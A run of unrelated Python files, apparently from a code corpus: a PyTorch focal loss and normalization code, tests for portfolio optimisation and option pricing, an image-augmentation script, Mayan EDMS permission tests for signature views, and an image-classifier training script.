                std = torch.sqrt(self.mean_squared - self.mean ** 2)
                return (input - self.mean) / (std + self.eps)
            else:
                raise NotImplementedError
        elif self.statistic =="instance":
            if self.normtype == "mean":
                return input - torch.mean(input, self.dims, keepdim=True)
            elif self.normtype == "standard":
                return (input - torch.mean(input, self.dims, keepdim=True)) / (
                    torch.std(input, self.dims, keepdim=True) + self.eps)
            elif self.normtype == "minmax":
                return (input - torch.amin(input, dim=self.dims, keepdim=True)) / (
                    torch.amax(input, dim=self.dims, keepdim=True)
                    - torch.amin(input, dim=self.dims, keepdim=True) + self.eps)
            else:
                raise NotImplementedError
        else:
            raise NotImplementedError
class AsymmetricalFocalLoss(nn.Module):
    """Focal-style binary loss with separate focusing terms per class state.

    gamma down-weights easy positives (active frames), zeta down-weights easy
    negatives (inactive frames). With gamma == zeta == 0 this reduces to plain
    binary cross-entropy. Logs are clamped at -100 for numerical stability.
    """

    def __init__(self, gamma=0, zeta=0):
        super(AsymmetricalFocalLoss, self).__init__()
        self.gamma = gamma  # balancing between classes
        self.zeta = zeta    # balancing between active/inactive frames

    def forward(self, pred, target):
        """Return the mean asymmetrical focal loss over all elements."""
        log_p = torch.clamp_min(torch.log(pred), -100)
        log_not_p = torch.clamp_min(torch.log(1 - pred), -100)
        pos_term = ((1 - pred) ** self.gamma) * target * log_p
        neg_term = (pred ** self.zeta) * (1 - target) * log_not_p
        return torch.mean(-(pos_term + neg_term))
def take_log(feature):
    """Convert an amplitude spectrogram to decibels, clamped to [-50, 80] dB."""
    to_db = torchaudio.transforms.AmplitudeToDB(stype="amplitude")
    to_db.amin = 1e-5  # floor tiny amplitudes before the log
    return to_db(feature).clamp(min=-50, max=80)
def count_parameters(model):
    """Return the number of trainable (requires_grad) scalar parameters in *model*."""
    return sum(p.numel() for p in model.parameters() if p.requires_grad)
|
<gh_stars>1-10
# Author: <NAME>
# Date: Mar 19, 2020
# Version: 0.0.2
import numpy as np
import pandas as pd
import time
import stochastic
import portfolio
def test_est():
    """Smoke-test portfolio.estimate over every mean/covariance estimator pair."""
    # Random problem size: a assets, b (> 2a) observations.
    a = np.random.randint(10, 20)
    b = np.random.randint(2 * a, 3 * a)
    m1 = ('equal_weights', 'exponential_weights', 'linear-weights')
    m2 = ('equal_weights', 'exponential_weights', 'ledoit_wolf', 'oas')
    test_set = pd.DataFrame(np.random.normal(size=(b, a)))
    for x in m1:
        for y in m2:
            rs = portfolio.estimate(test_set, x, y)
            print(rs)
def test_markowitz(n1=100, n2=1000, n3=1000):
    """Randomized checks of portfolio.Markowitz allocation.

    n1 is the number of simulated data sets; n2/n3 count the random
    competitor portfolios per data set (without/with short constraints).
    Failure counts per case are printed at the end.
    """
    # FIX: np.int was removed in NumPy 1.24; use the builtin int dtype.
    cases = np.zeros(4, dtype=int)
    for _ in range(n1):
        # simulated data set
        a = np.random.randint(10, 20)
        b = np.random.randint(2 * a, 3 * a)
        test_set = pd.DataFrame(np.random.normal(size=(b, a)))
        rs, covs = portfolio.estimate(test_set)
        '''
        singleton1: no short constraints
        singleton2: short constraints, (-inf, inf)
        compare singleton1 with singleton2
        measure the efficiency of optimization algorithm (scipy.optimize.minimize)
        singleton3: short constraints, (0, 1) -> non-negative
        '''
        singleton1 = portfolio.Markowitz(covs, rs)
        singleton2 = portfolio.Markowitz(covs, rs, bounds=((None, None),))
        singleton3 = portfolio.Markowitz(covs, rs, bounds=((0, 1),))
        ''' Without short constraints '''
        # Unbounded and (-inf, inf)-bounded GMV should agree within tolerance.
        w1 = singleton1.allocate('GMV')
        w2 = singleton2.allocate('GMV')
        if (np.absolute(w1 - w2) > 1e-8).any():
            print(np.absolute(w1 - w2).max())
            cases[0] += 1
        port_cov1 = w1 @ covs @ w1
        for _ in range(n2):
            random_weights = np.random.normal(size=a)
            random_weights /= random_weights.sum()
            random_cov = random_weights @ covs @ random_weights
            # check if variance is minimum among other portfolios
            if random_cov < port_cov1:
                cases[1] += 1
        ''' With short constraints '''
        w3 = singleton3.allocate('GMV')
        port_cov3 = w3 @ covs @ w3
        w4 = singleton3.allocate('MSR')
        # NOTE(review): "sharpe" here is return over *variance*, not return
        # over std — confirm this is the intended objective.
        port_sharpe3 = (w4 @ rs) / (w4 @ covs @ w4)
        for _ in range(n3):
            random_weights = np.absolute(np.random.normal(size=a))
            random_weights /= random_weights.sum()
            random_cov = random_weights @ covs @ random_weights
            random_sharpe = random_weights @ rs / random_cov
            # check if variance is minimum among other portfolios
            if random_cov < port_cov3:
                cases[2] += 1
            # check if sharpe is maximum among other portfolios
            if random_sharpe > port_sharpe3:
                cases[3] += 1
                print(random_sharpe, port_sharpe3)
        ''' Portfolio with expected returns '''
        er = np.random.uniform(0.0, 0.2)
        w5 = singleton1.allocate('opt-ret', er)
        w6 = singleton2.allocate('opt-ret', er)
        if (np.absolute(w5 - w6) > 1e-8).any():
            print(np.absolute(w5 - w6).max())
            cases[0] += 1
    print(f'Case 1 Error: Exceed maximum tolerance in optimization. {cases[0]} / {n1 * 2} failed.')
    print(f'Case 2 Error: GMV without short constraints is incorrect. {cases[1]} / {n1 * n2} failed.')
    print(f'Case 3 Error: GMV with short constraints is incorrect. {cases[2]} / {n1 * n3} failed.')
    print(f'Case 4 Error: MSR with short constraints is incorrect. {cases[3]} / {n1 * n3} failed.')
def test_rp(n=100):
    """Placeholder for a risk-parity test — not implemented yet."""
    pass
def test_stochastic_simulate_ir(times=10000):
    """Monte-Carlo sanity check of the OU and CIR short-rate simulators.

    Averages *times* simulated terminal rates; both models should print a
    value near 0.037 for these parameters.
    """
    # ou, cir
    ou = stochastic.OrnsteinUhlenbeck(0.02, 0.05, 1, 0.1, 0.2)
    # FIX: np.float was removed in NumPy 1.24; use the builtin float dtype.
    res1 = np.fromiter((ou.simulate() for _ in range(times)), dtype=float).mean()
    print(res1) # 0.037
    print()
    cir = stochastic.CoxIntergellRoss(0.02, 0.05, 1, 0.1, 0.2)
    res = np.fromiter((cir.simulate() for _ in range(times)), dtype=float).mean()
    print(res) # 0.037
def test_stochastic_simulate_stock(model=0):
    """Run CEV Monte-Carlo pricing over several option/exercise/style combinations."""
    # Two market scenarios (spot, rate, vol, expiry, elasticity).
    if model == 0:
        cev = stochastic.CEV(292.45, 0.0236, 0.12, 84 / 252, 1.0)
    elif model == 1:
        cev = stochastic.CEV(120.0, 0.04, 0.3, 0.5, 1.0)
    options = ['call', 'put', 'call-spread', 'put-spread', 'call-binary', 'put-binary'] #
    exercises = ['vanilla'] # 'lookback-fixed', 'lookback-float' 'Asian-fixed', 'Asian-float'
    styles = ['American'] # 'European'
    for option in options:
        for exercise in exercises:
            # Spread payoffs need two strikes; float-strike exercises are skipped.
            if option[-1] == 'd':
                if exercise[-1] == 't':
                    continue
                strikes = (310.0, 315.0)
            else:
                strikes = (310.0,)
            for style in styles:
                res = cev.simulate(n=1000, pack=(option, exercise, style, *strikes, 10000, None, None))
                print(option, exercise, style, res)
def test_cev_pde(case=2):
    """ test the special case (BS-Model), check if pde solution converges to formula solution """
    # Three market scenarios: (spot, rate, vol, expiry) plus a strike pair.
    if case == 0:
        t = 144 / 252
        cev = stochastic.CEV(277.33, 0.0247, 0.1118, t, 1.0)
        k1, k2 = 285.0, 290.0
    elif case == 1:
        t = 1.0
        cev = stochastic.CEV(100.0, 0.1, 0.3, t, 1.0)
        k1, k2 = 95.0, 105.0
    elif case == 2:
        t = 84 / 252
        cev = stochastic.CEV(292.45, 0.0236, 0.12, 84 / 252, 1.0)
        k1, k2 = 310.0, 315.0
    # Price every payoff/exercise combination on a 1000-step time grid.
    d = {1: cev.pde(t / 1000, 0.01, ('call', 'European', k1)),
         2: cev.pde(t / 1000, 0.01, ('put', 'European', k1)),
         3: cev.pde(t / 1000, 0.01, ('call-spread', 'European', k1, k2)),
         4: cev.pde(t / 1000, 0.01, ('put-spread', 'European', k1, k2)),
         5: cev.pde(t / 1000, 0.01, ('call-binary', 'European', k1)),
         6: cev.pde(t / 1000, 0.01, ('put-binary', 'European', k1)),
         7: cev.pde(t / 1000, 0.01, ('call', 'American', k1)),
         8: cev.pde(t / 1000, 0.01, ('put', 'American', k1)),
         9: cev.pde(t / 1000, 0.01, ('call-spread', 'American', k1, k2)),
         10: cev.pde(t / 1000, 0.01, ('put-spread', 'American', k1, k2)),
         11: cev.pde(t / 1000, 0.01, ('call-binary', 'American', k1)),
         12: cev.pde(t / 1000, 0.01, ('put-binary', 'American', k1))}
    for v in d.values():
        print(v)
# Reference values recorded from a previous run of the block above.
"""
7.68560738555255 11.361290729770904 7.6786823587981825 11.911016320988761
1.8823261132827405 2.64853753885148 3.108537197878851 4.929993852051919
19.47436149386628 5.433098144275096 19.474361504654876 5.936348291067235
5.184298869815485 2.6868106922175428 8.046269671302197 4.801753497973709
"""
def test_bs_formula():
bs = stochastic.BlackScholes(277.33, 0.0247, 0.1118, 144/252)
c1 = bs.european_vanilla_option_formula(285.0, 'call', 'value')
c2 = bs.european_vanilla_option_formula(290.0, 'call', 'value')
p1 = bs.european_vanilla_option_formula(285.0, 'put', 'value')
p2 = bs.european_vanilla_option_formula(290.0, 'put', 'value')
cb1 = bs.european_vanilla_option_formula(280.0, 'call', 'value')
b1 = bs.european_barrier_option_formula(280.0, 300.0, 0.0, 'up-out-call', 'value') # 0.0070
print(c1, c1-c2, p1, p2-p1)
print(cb1, b1) # 7.6856073822393824 1.8823250330486587 11.361290726706613 3.0475992361525073
def test_heston_calibrate():
ht = stochastic.Heston(267.15, 0.015, 0.08, 0.7, 0.1, 0.2, -0.4, 0.5, 2.0, 0.0177)
df = pd.read_csv(r'data\opt-data.csv')
tm = df['expT'].values
km = df['K'].values
cm = (df['call_bid'].values + df['call_ask'].values) / 2
print(tm, km, cm)
res = ht.calibrate(tm, km, cm)
print(res) # [ 0.06110104, 0.52289908, 0.07485918, 2.68277196, -0.55149318]
def test_cev_calibrate():
t = 144 / 252
cev = stochastic.CEV(277.33, 0.0247, 0.1118, t, 1.0)
df = pd.read_csv(r'data\opt-data.csv')
# expiry, strike, call price, put price
tm = df['expT'].values
km = df['K'].values
cm = (df['call_bid'].values + df['call_ask'].values) / 2
pm = (df['put_bid'].values + df['put_ask'].values) / 2
res = cev.calibrate(tm, km, cm, pm)
print(res)
if __name__ == '__main__':
    # Manual test driver: uncomment the scenario(s) to run, then execute
    # this module directly. Elapsed wall-clock time is printed at the end.
    start = time.time()
    # test_est()
    # test_markowitz()
    # test_stochastic_simulate_ir()
    # test_stochastic_simulate_stock(0)
    # test_cev_pde(2)
    # test_bs_formula()
    # test_cev_calibrate()
    # a = cp.exp(1)
    print('t', time.time() - start)  # seconds spent in whatever ran above
|
<filename>4_Data_Augmentation.py
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 28 14:44:36 2019
@author: fg010
"""
import os
import cv2
import numpy as np
import imgaug as ia
from imgaug import augmenters as iaa
import glob
"""
该过程可选
需要预先复制一份train set到同一个文件夹下,取名为train_data_augmentation
"""
def Data_Augmentation(path, save_path):
    """Augment every .jpg under `path`, writing 3 augmented copies per image to `save_path`.

    Output files are named '<original stem><1|2|3>.jpg'. Files that cannot
    be read, decoded or augmented are skipped so one bad image does not
    abort the whole batch.
    """
    all_images = glob.glob(path + '\\*.jpg')  # every jpg in the source directory

    # Apply the wrapped augmenter with probability 0.5.
    sometimes = lambda aug: iaa.Sometimes(0.5, aug)

    # Build the augmentation pipeline once; it is identical for every image,
    # so constructing it inside the per-image loop (as before) was wasted work.
    seq = iaa.Sequential(
        [
            iaa.Fliplr(0.5),  # horizontal flips
            iaa.Flipud(0.5),  # vertical flips
            sometimes(iaa.Crop(percent=(0, 0.1))),  # random crop, up to 10%
            sometimes(iaa.Affine(  # affine transform on some images
                scale={'x': (0.8, 1.2), 'y': (0.8, 1.2)},  # scale to 80%-120%
                translate_percent={'x': (-0.2, 0.2), 'y': (-0.2, 0.2)},  # translate +-20%
                rotate=(-20, 20),  # rotate +-20 degrees
                shear=(-16, 16),  # shear +-16 degrees (rectangle -> parallelogram)
                cval=(0, 255),  # fill revealed pixels with black..white
                # mode=ia.ALL  # how to fill areas outside the image
            )),
            # Optionally enable 0-2 of the following extra augmenters:
            # iaa.SomeOf((0, 2),
            #            [
            #                iaa.Sharpen(alpha=(0, 0.3), lightness=(0.9, 1.1)),  # sharpen
            #                iaa.AdditiveGaussianNoise(loc=0, scale=(0.0, 0.05*255), per_channel=0.5),
            #                iaa.Add((-10, 10), per_channel=0.5),  # add -10..10 per pixel
            #                iaa.Multiply((0.8, 1.2), per_channel=0.5),  # multiply pixels
            #                iaa.ContrastNormalization((0.5, 2.0), per_channel=0.5),  # halve/double contrast
            #            ],
            #            random_order=False)
        ],
        random_order=True  # apply the steps in random order
    )

    # NOTE: the loop variable no longer shadows the `path` parameter.
    for image_path in all_images:
        name = os.path.basename(image_path)[:-4]  # file stem without '.jpg'
        try:
            # np.fromfile + imdecode handles non-ASCII paths on Windows.
            image = cv2.imdecode(np.fromfile(image_path, dtype=np.uint8), 1)
        except Exception:
            continue  # unreadable file: skip it, keep processing the rest
        if image is None:
            # imdecode signals decode failure by returning None, not raising.
            continue
        batch = [image, image, image]  # triple the data volume
        try:
            images_aug = seq.augment_images(batch)  # apply the augmentation
        except Exception:
            continue  # augmentation failed for this image: skip it
        for index, augmented in enumerate(images_aug, start=1):
            # imencode + tofile handles non-ASCII output paths on Windows.
            cv2.imencode('.jpg', augmented)[1].tofile(
                save_path + '\\%s%s.jpg' % (name, index)
            )
    print('增强图片完成')
#%%
# Augment every class sub-directory of the training set, writing the
# augmented images back into the same directory.
train_dir = './data/train'
for i, dirname in enumerate(os.listdir(train_dir)):  # dirname: class folder (0, 1, 2, ...)
    path = train_dir + '\\' + dirname
    print(path, i)
    Data_Augmentation(path, path)
<reponame>atitaya1412/Mayan-EDMS
from mayan.apps.django_gpg.permissions import permission_key_sign
from mayan.apps.django_gpg.tests.mixins import KeyTestMixin
from mayan.apps.documents.tests.base import GenericDocumentViewTestCase
from mayan.apps.documents.tests.literals import (
TEST_DOCUMENT_PATH, TEST_SMALL_DOCUMENT_PATH
)
from ..events import (
event_detached_signature_created, event_detached_signature_deleted,
event_detached_signature_uploaded
)
from ..models import DetachedSignature
from ..permissions import (
permission_document_file_sign_detached,
permission_document_file_signature_delete,
permission_document_file_signature_download,
permission_document_file_signature_upload,
permission_document_file_signature_view
)
from .mixins import (
DetachedSignatureViewTestMixin, DetachedSignatureTestMixin
)
class DetachedSignaturesViewTestCase(
    KeyTestMixin, DetachedSignatureTestMixin, DetachedSignatureViewTestMixin,
    GenericDocumentViewTestCase
):
    """Permission tests for the detached document file signature views.

    Each test asserts three things: the view's HTTP status code, the
    resulting signature count, and the events emitted (none when the
    action is denied; a 404 means the object is hidden from the user).
    """
    # Each test uploads its own document so it can choose the fixture path.
    auto_upload_test_document = False

    def test_detached_signature_create_view_with_no_permission(self):
        """Without any grant the signing view is hidden (404), no signature made."""
        self.test_document_path = TEST_SMALL_DOCUMENT_PATH
        self._upload_test_document()
        self._create_test_key_private()

        signature_count = self.test_document.file_latest.signatures.count()

        self._clear_events()

        response = self._request_test_document_file_signature_create_view()
        self.assertEqual(response.status_code, 404)

        self.assertEqual(
            self.test_document.file_latest.signatures.count(),
            signature_count
        )

        events = self._get_test_events()
        self.assertEqual(events.count(), 0)

    def test_detached_signature_create_view_with_document_access(self):
        """Document access alone renders the view (200) but creates no signature."""
        self.test_document_path = TEST_SMALL_DOCUMENT_PATH
        self._upload_test_document()
        self._create_test_key_private()

        signature_count = self.test_document.file_latest.signatures.count()

        self.grant_access(
            obj=self.test_document,
            permission=permission_document_file_sign_detached
        )

        self._clear_events()

        response = self._request_test_document_file_signature_create_view()
        self.assertEqual(response.status_code, 200)

        self.assertEqual(
            self.test_document.file_latest.signatures.count(),
            signature_count
        )

        events = self._get_test_events()
        self.assertEqual(events.count(), 0)

    def test_detached_signature_create_view_with_key_access(self):
        """Key access alone still hides the document's signing view (404)."""
        self.test_document_path = TEST_SMALL_DOCUMENT_PATH
        self._upload_test_document()
        self._create_test_key_private()

        signature_count = self.test_document.file_latest.signatures.count()

        self.grant_access(
            obj=self.test_key_private,
            permission=permission_key_sign
        )

        self._clear_events()

        response = self._request_test_document_file_signature_create_view()
        self.assertEqual(response.status_code, 404)

        self.assertEqual(
            self.test_document.file_latest.signatures.count(),
            signature_count
        )

        events = self._get_test_events()
        self.assertEqual(events.count(), 0)

    def test_detached_signature_create_view_with_full_access(self):
        """Document + key access signs the file (302), adding one signature and one event."""
        self.test_document_path = TEST_SMALL_DOCUMENT_PATH
        self._upload_test_document()
        self._create_test_key_private()

        signature_count = self.test_document.file_latest.signatures.count()

        self.grant_access(
            obj=self.test_document,
            permission=permission_document_file_sign_detached
        )
        self.grant_access(
            obj=self.test_key_private,
            permission=permission_key_sign
        )

        self._clear_events()

        response = self._request_test_document_file_signature_create_view()
        self.assertEqual(response.status_code, 302)

        self.assertEqual(
            self.test_document.file_latest.signatures.count(),
            signature_count + 1
        )

        # Exactly one `created` event, attributed to the acting user, with
        # the new signature as action object and the file as target.
        events = self._get_test_events()
        self.assertEqual(events.count(), 1)

        self.assertEqual(
            events[0].action_object,
            self.test_document_file.signatures.first().detachedsignature
        )
        self.assertEqual(events[0].actor, self._test_case_user)
        self.assertEqual(events[0].target, self.test_document_file)
        self.assertEqual(events[0].verb, event_detached_signature_created.id)

    def test_trashed_document_detached_signature_create_view_with_full_access(self):
        """A trashed document cannot be signed even with full access (404)."""
        self.test_document_path = TEST_SMALL_DOCUMENT_PATH
        self._upload_test_document()
        self._create_test_key_private()

        signature_count = self.test_document.file_latest.signatures.count()

        self.grant_access(
            obj=self.test_document,
            permission=permission_document_file_sign_detached
        )
        self.grant_access(
            obj=self.test_key_private,
            permission=permission_key_sign
        )

        # Move the document to the trash before requesting the view.
        self.test_document.delete()

        self._clear_events()

        response = self._request_test_document_file_signature_create_view()
        self.assertEqual(response.status_code, 404)

        self.assertEqual(
            self.test_document.file_latest.signatures.count(),
            signature_count
        )

        events = self._get_test_events()
        self.assertEqual(events.count(), 0)

    def test_detached_signature_delete_view_no_permission(self):
        """View permission alone does not allow deleting a signature (404)."""
        self.test_document_path = TEST_SMALL_DOCUMENT_PATH
        self._upload_test_document()
        self._upload_test_detached_signature()

        signature_count = DetachedSignature.objects.count()

        self.grant_access(
            obj=self.test_document,
            permission=permission_document_file_signature_view
        )

        self._clear_events()

        response = self._request_test_document_file_signature_detached_delete_view()
        self.assertEqual(response.status_code, 404)

        self.assertEqual(DetachedSignature.objects.count(), signature_count)

        events = self._get_test_events()
        self.assertEqual(events.count(), 0)

    def test_detached_signature_delete_view_with_access(self):
        """Delete + view access removes the signature (302) and emits a `deleted` event."""
        self.test_document_path = TEST_SMALL_DOCUMENT_PATH
        self._upload_test_document()
        self._upload_test_detached_signature()

        signature_count = DetachedSignature.objects.count()

        self.grant_access(
            obj=self.test_document,
            permission=permission_document_file_signature_delete
        )
        self.grant_access(
            obj=self.test_document,
            permission=permission_document_file_signature_view
        )

        self._clear_events()

        response = self._request_test_document_file_signature_detached_delete_view()
        self.assertEqual(response.status_code, 302)

        self.assertEqual(
            DetachedSignature.objects.count(), signature_count - 1
        )

        # The signature is gone, so the event has no action object; the
        # document file plays both actor and target roles.
        events = self._get_test_events()
        self.assertEqual(events.count(), 1)

        self.assertEqual(events[0].action_object, None)
        self.assertEqual(events[0].actor, self.test_document_file)
        self.assertEqual(events[0].target, self.test_document_file)
        self.assertEqual(events[0].verb, event_detached_signature_deleted.id)

    def test_trashed_document_signature_delete_view_with_access(self):
        """Signatures of a trashed document cannot be deleted (404)."""
        self.test_document_path = TEST_SMALL_DOCUMENT_PATH
        self._upload_test_document()
        self._upload_test_detached_signature()

        signature_count = DetachedSignature.objects.count()

        self.grant_access(
            obj=self.test_document,
            permission=permission_document_file_signature_delete
        )
        self.grant_access(
            obj=self.test_document,
            permission=permission_document_file_signature_view
        )

        # Move the document to the trash before requesting the view.
        self.test_document.delete()

        self._clear_events()

        response = self._request_test_document_file_signature_detached_delete_view()
        self.assertEqual(response.status_code, 404)

        self.assertEqual(
            DetachedSignature.objects.count(), signature_count
        )

        events = self._get_test_events()
        self.assertEqual(events.count(), 0)

    def test_signature_download_view_no_permission(self):
        """Without the download permission the signature download is hidden (404)."""
        self.test_document_path = TEST_SMALL_DOCUMENT_PATH
        self._upload_test_document()
        self._upload_test_detached_signature()

        self._clear_events()

        response = self._request_test_document_file_signature_detached_download_view()
        self.assertEqual(response.status_code, 404)

        events = self._get_test_events()
        self.assertEqual(events.count(), 0)

    def test_signature_download_view_with_access(self):
        """Download access streams the raw signature file; no events are emitted."""
        self.test_document_path = TEST_SMALL_DOCUMENT_PATH
        self._upload_test_document()
        self._upload_test_detached_signature()

        self.grant_access(
            obj=self.test_document,
            permission=permission_document_file_signature_download
        )

        self.expected_content_types = ('application/octet-stream',)

        self._clear_events()

        response = self._request_test_document_file_signature_detached_download_view()

        # Response body must match the stored signature file byte-for-byte.
        with self.test_signature.signature_file as file_object:
            self.assert_download_response(
                response=response, content=file_object.read(),
            )

        events = self._get_test_events()
        self.assertEqual(events.count(), 0)

    def test_trashed_document_signature_download_view_with_access(self):
        """Signatures of a trashed document cannot be downloaded (404)."""
        self.test_document_path = TEST_SMALL_DOCUMENT_PATH
        self._upload_test_document()
        self._upload_test_detached_signature()

        self.grant_access(
            obj=self.test_document,
            permission=permission_document_file_signature_download
        )

        # Move the document to the trash before requesting the view.
        self.test_document.delete()

        self._clear_events()

        response = self._request_test_document_file_signature_detached_download_view()
        self.assertEqual(response.status_code, 404)

        events = self._get_test_events()
        self.assertEqual(events.count(), 0)

    def test_signature_upload_view_no_permission(self):
        """Without the upload permission the upload view is hidden (404)."""
        self.test_document_path = TEST_DOCUMENT_PATH
        signature_count = DetachedSignature.objects.count()
        self._upload_test_document()

        self._clear_events()

        response = self._request_test_document_file_signature_detached_upload_view()
        self.assertEqual(response.status_code, 404)

        self.assertEqual(DetachedSignature.objects.count(), signature_count)

        events = self._get_test_events()
        self.assertEqual(events.count(), 0)

    def test_signature_upload_view_with_access(self):
        """Upload access stores the signature (302) and emits an `uploaded` event."""
        self.test_document_path = TEST_DOCUMENT_PATH
        self._upload_test_document()
        self.grant_access(
            obj=self.test_document,
            permission=permission_document_file_signature_upload
        )

        signature_count = DetachedSignature.objects.count()

        self._clear_events()

        response = self._request_test_document_file_signature_detached_upload_view()
        self.assertEqual(response.status_code, 302)

        self.assertEqual(
            DetachedSignature.objects.count(), signature_count + 1
        )

        # One `uploaded` event: acting user as actor, new signature as
        # action object, document file as target.
        events = self._get_test_events()
        self.assertEqual(events.count(), 1)

        self.assertEqual(
            events[0].action_object,
            self.test_document.file_latest.signatures.first().detachedsignature
        )
        self.assertEqual(events[0].actor, self._test_case_user)
        self.assertEqual(events[0].target, self.test_document_file)
        self.assertEqual(events[0].verb, event_detached_signature_uploaded.id)

    def test_trashed_document_signature_upload_view_with_access(self):
        """A signature cannot be uploaded for a trashed document (404)."""
        self.test_document_path = TEST_DOCUMENT_PATH
        self._upload_test_document()
        self.grant_access(
            obj=self.test_document,
            permission=permission_document_file_signature_upload
        )

        # Move the document to the trash before requesting the view.
        self.test_document.delete()

        signature_count = DetachedSignature.objects.count()

        self._clear_events()

        response = self._request_test_document_file_signature_detached_upload_view()
        self.assertEqual(response.status_code, 404)

        self.assertEqual(DetachedSignature.objects.count(), signature_count)

        events = self._get_test_events()
        self.assertEqual(events.count(), 0)
|
# -*- coding: utf-8 -*-
import argparse
import time
from model import resnet
from model.dpn import dpn92
import torch
import torch.backends.cudnn as cudnn
import torchvision
from torchvision import transforms
import torch.nn as nn
from torch.autograd import Variable
from model.utils import load_filtered_state_dict, SaveBestModel, AverageMeter, accuracy
from data_wrapper import get_dataset, DataWrapper
from tensorboardX import SummaryWriter
def parse_args():
    """Parse and return the command-line arguments for training."""
    parser = argparse.ArgumentParser(description='Head pose estimation using the Hopenet network.')
    add = parser.add_argument
    add('--gpu', dest='gpu', help='GPU device id to use', nargs='+',
        default=[0, 1], type=int)
    add('--num_epochs', dest='num_epochs', help='Maximum number of training epochs.',
        default=100, type=int)
    add('--batch_size', dest='batch_size', help='Batch size.',
        default=64, type=int)
    add('--lr', dest='lr', help='Base learning rate.',
        default=0.1, type=float)
    add('--trainning_data_dir', dest='trainning_data_dir', help='Directory path for trainning data.',
        default='./data/train', type=str)
    add('--validation_data_dir', dest='validation_data_dir', help='Directory path for validation data.',
        default='./data/test', type=str)
    add('--save_path', dest='save_path', help='Path of model snapshot for save.',
        default='./models', type=str)
    add('--saved_model', help='Path of model snapshot for continue training.',
        default='./models/resnet50-19c8e357.pth', type=str)
    return parser.parse_args()
def evaluate(eval_loader, model, writer, step, Save_model, epoch):
    """Evaluate the model over the full validation loader.

    Logs the averaged top-1 precision to TensorBoard and hands the model
    to Save_model, which persists it (checkpointing policy is its own).
    """
    precision_meter = AverageMeter()
    softmax = nn.Softmax().cuda()
    for images, labels, _ in eval_loader:
        images = Variable(images).cuda()
        labels = Variable(labels).cuda()
        predictions = softmax(model(images))
        batch_prec = accuracy(predictions, labels, topk=(1,))
        precision_meter.update(batch_prec[0].item())
    print('evaluate * Prec@1 {top:.3f}'.format(top=precision_meter.avg))
    writer.add_scalar('eval_prec', precision_meter.avg, step)
    Save_model.save(model, precision_meter.avg, epoch)
def train(train_loader, model, criterion, optimizer, writer, batch_size, epoch, step, n):
    """Run one training epoch and return the incremented global step.

    Every 10 iterations the throughput (samples/sec) and loss are printed;
    after the loop, top-1 accuracy is reported on the epoch's last batch.
    """
    last_time = time.time()
    # Log the learning rate of the first parameter group only.
    writer.add_scalar('learning_rate', optimizer.param_groups[0]['lr'], step)

    for i, (images, labels, _) in enumerate(train_loader):
        images = Variable(images).cuda()
        labels = Variable(labels).cuda()
        label_pred = model(images)

        # Cross entropy loss on the raw logits.
        loss = criterion(label_pred, labels)
        writer.add_scalar('loss', loss, step)

        optimizer.zero_grad()
        loss.backward()
        optimizer.step()

        if i % 10 == 0:
            now = time.time()
            samples_per_sec = 10.0 / (now - last_time) * batch_size
            print("Epoch [{}], Iter [{}/{}] {} samples/sec, Losses: {}".format(
                epoch+1, i+1, n//batch_size, samples_per_sec, loss.item()))
            last_time = now
        step += 1

    # Report training accuracy on the final batch of the epoch.
    label_pred = nn.Softmax().cuda()(label_pred)
    prec = accuracy(label_pred, labels, topk=(1,))
    print('training * Prec@1 {top:.3f}'.format(top=prec[0].item()))
    writer.add_scalar('training_prec', prec[0].item(), step)
    return step
def main(args):
    """Train an image classifier (ResNet50 by default) on folder-per-class data.

    Builds train/eval loaders from args.trainning_data_dir and
    args.validation_data_dir, optionally loads a saved snapshot, then runs
    the evaluate/train loop for args.num_epochs epochs.
    """
    cudnn.enabled = True

    print('Loading data.')
    # Resize to 320, random-crop to 299, normalize with the standard
    # ImageNet channel statistics.
    transformations = transforms.Compose([transforms.Resize(320),
                                          transforms.RandomCrop(299), transforms.ToTensor(),
                                          transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])

    train_x, train_y, classes_names = get_dataset(args.trainning_data_dir)
    test_x, test_y, _ = get_dataset(args.validation_data_dir)
    num_classes = len(classes_names)
    print("classes : {}".format(classes_names))

    trainning_dataset = DataWrapper(train_x, train_y, transformations)
    eval_dataset = DataWrapper(test_x, test_y, transformations)

    train_loader = torch.utils.data.DataLoader(dataset=trainning_dataset,
                                               batch_size=args.batch_size,
                                               shuffle=True,
                                               num_workers=16)
    eval_loader = torch.utils.data.DataLoader(dataset=eval_dataset,
                                              batch_size=args.batch_size,
                                              shuffle=True,
                                              num_workers=16)
    n = trainning_dataset.__len__()  # number of training samples
    print(n)

    # ResNet50 structure
    model = resnet.ResNet(torchvision.models.resnet.Bottleneck, [3, 4, 6, 3], num_classes)
    # dpn 92
    #model = dpn92(num_classes=num_classes)

    if args.saved_model:
        print('Loading model.')
        saved_state_dict = torch.load(args.saved_model)
        # 'origin model from pytorch': snapshots whose path contains
        # 'resnet' are loaded without key remapping, others with
        # reverse=True (exact remapping semantics live in
        # load_filtered_state_dict — confirm against model/utils).
        if 'resnet' in args.saved_model:
            load_filtered_state_dict(model, saved_state_dict, ignore_layer=[], reverse=False)
        else:
            load_filtered_state_dict(model, saved_state_dict, ignore_layer=[], reverse=True)

    crossEntropyLoss = nn.CrossEntropyLoss().cuda()
    #optimizer = torch.optim.Adam(model.parameters(), lr = args.lr )
    optimizer = torch.optim.SGD(model.parameters(), lr=args.lr, momentum=0.9)
    # Decay the learning rate 10x at epochs 20, 40 and 60.
    scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[20, 40, 60], gamma=0.1)

    # multi-gpu
    model = nn.DataParallel(model, device_ids=args.gpu)
    model.cuda()

    Save_model = SaveBestModel(save_dir=args.save_path)
    Writer = SummaryWriter()
    step = 0
    for epoch in range(args.num_epochs):
        # NOTE(review): scheduler.step() is called at the start of each
        # epoch and evaluate() runs before any training, so the first
        # evaluation measures the freshly loaded weights. Recent PyTorch
        # expects scheduler.step() after the epoch's optimizer updates —
        # confirm this ordering is intentional.
        scheduler.step()
        evaluate(eval_loader, model, Writer, step, Save_model, epoch)
        step = train(train_loader, model, crossEntropyLoss, optimizer, Writer, args.batch_size, epoch, step, n)
if __name__ == '__main__':
    # Entry point: parse CLI options and start training.
    main(parse_args())
|
# coding=utf-8
# Copyright 2022 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
